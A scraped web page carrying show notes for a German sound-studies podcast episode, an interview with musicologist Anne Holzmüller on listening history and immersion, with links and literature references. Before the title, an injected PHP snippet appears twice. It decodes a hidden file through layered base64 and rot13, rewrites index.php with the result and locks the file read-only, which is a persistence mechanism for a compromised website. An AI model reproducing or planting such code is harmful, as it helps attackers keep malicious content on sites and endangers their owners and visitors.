$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } $i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } Anne Holzmüller über Musikalische Streichhölzer, Medientechnologien und die Geschichte musikalischen Hörens – Auditive Medienkulturen

Anne Holzmüller über Musikalische Streichhölzer, Medientechnologien und die Geschichte musikalischen Hörens

Lorenz Gilli im Gespräch mit Anne Holzmüller, Qualifikationsprofessorin für „Akustische Kultur und Musikvermittlung“ an der Philipps-Universität Marburg

Anne Holzmüller ist seit 2020 Qualifikationsprofessorin für Akustische Kulturen und Musikvermittlung an der Philipps-Universität Marburg. Sie hat Schulmusik mit den Schwerpunkten Klavier und Musiktheorie sowie Germanistik studiert und zum Thema „Lyrik als Klangkunst“ promoviert. Sie hatte Fellowships inne am Music Department der Universität Harvard in den USA und am Freiburg Institute for Advanced Studies. Zuletzt hat sie in Freiburg am Sonderforschungsbereich 1015 “Muße. Gesellschaftliche Ressource | Kritisches Potenzial” das Teilprojekt „Muße und musikalische Immersionserlebnisse” geleitet. Für diese Episode des Podcasts “Sounds of Sound Studies” habe ich Anne Holzmüller digital über Zoom getroffen.

Die Hintergründe des Podcast erklären wie hier.

Das Gespräch mit Anne Holzmüller gibt es als Transkript in einem eigenen Magazin-Beitrag.

Wir freuen uns über Fragen, Anregungen & Feedback per Mail an: auditive.medienkulturen@gmail.com

Shownotes:

Website von Anne Holzmüller an der Philipps-Universität Marburg: https://www.uni-marburg.de/de/fb09/musikwissenschaft/personalseiten/prof-dr-anne-holzmueller

Website des Teilprojekts R1 „Muße und musikalische Immersionserlebnisse” im Sonderforschungsbereich (SFB) 1015 „Muße. Gesellschaftliche Ressource | Kritisches Potenzial“ an der Universität Freiburg https://www.sfb1015.uni-freiburg.de/de/teilprojekte/r-raumzeitlichkeit

Johannes Brahms: https://de.wikipedia.org/wiki/Johannes_Brahms

Fiona Apple – “I Know” (Album: When the Pawn …, 1999) https://youtu.be/wB09p4MF7gw

Musique concrète: https://de.wikipedia.org/wiki/Musique_concr%C3%A8te

Ryan, Dr Marie-Laure. 2003. Narrative as Virtual Reality: Immersion and Interactivity in Literature and Electronic Media. Baltimore, Md.: The Johns Hopkins University Press.

Jacob Collier: https://www.youtube.com/user/jacobcolliermusic/

Adam Neely: https://www.youtube.com/c/AdamNeely

Anmerkungen zur Atmosphäre bei Schmitz und Böhme: Hermann Schmitz hat den Begriff der ‘Atmosphäre’ in die phänomenologische Philosophie eingeführt, siehe dazu bspw. Schmitz, Hermann. 1964. System der Philosophie. Bonn: Bouvier, oder ders. 2016. Atmosphären. 2. Auflage. Freiburg: Verlag Karl Alber. Gernot Böhme baut auf Schmitz auf und macht den Begriff v.a. für die (Neue) Ästhetik fruchtbar, siehe dazu bpsw. Böhme, Gernot. 2001. Aisthetik: Vorlesungen über Ästhetik als allgemeine Wahrnehmungslehre. München: Fink, oder ders. 2014. Atmosphäre: Essays zur neuen Ästhetik. 2. Aufl. der 7., erw. überarb. Aufl. Edition Suhrkamp 2664. Berlin: Suhrkamp.

Anmerkungen zu wissenschaftlichern Arbeiten zum Hören in der Zeit vor dem 20. Jh: Zum einen hat auch Jens Gerrit Papenburg in der zweiten Episode des Podcasts auf Arbeiten aus den 1990er Jahren zum Hören des Konzert-Publikums verwiesen, die aber in eine Zeit fallen, in der das Forschungsfeld Sound Studies noch kaum konturiert ist.  Zum anderen beschränkt sich auch Karin Bijsterveld in ihren Arbeiten größtenteils auf das 20. (und 21.) Jh., so auch in dem von ihr herausgegebenen Sammelband „Soundscapes of the Urban Past“ (2013).

Holzmüller, Anne. 2019. „Between Things and Souls: Sacred Atmospheres and Immersive Listening in Late Eighteenth-Century Sentimentalism“. In Music as Atmosphere: Collective Feelings and Affective Sounds, herausgegeben von Friedlind Riedel und Juha Torvinen, 1. Aufl., 218–37. [1.] | New York : Routledge, 2019. | Series: Ambiances, Atmospheres and Sensory Experiences of Spaces: Routledge. https://doi.org/10.4324/9780815358718.

Sonderheft “Listening Practice” des Journals Early Music (Vol. 25, No. 4, Nov., 1997). https://www.jstor.org/stable/i357066.

Thorau, Christian, und Hansjakob Ziemer, Hrsg. 2019. The Oxford Handbook of Music Listening in the 19th and 20th Centuries. Oxford handbooks. New York, NY: Oxford University Press. https://www.oxfordhandbooks.com/view/10.1093/oxfordhb/9780190466961.001.0001/oxfordhb-9780190466961

akusmatisches Hören bzw. Akusmatik: https://de.wikipedia.org/wiki/Akusmatik

Credits

Interview: Lorenz Gilli
Sounddesign: Matthias Roeckl & Rainer Schaller (rainer@slut-music.com)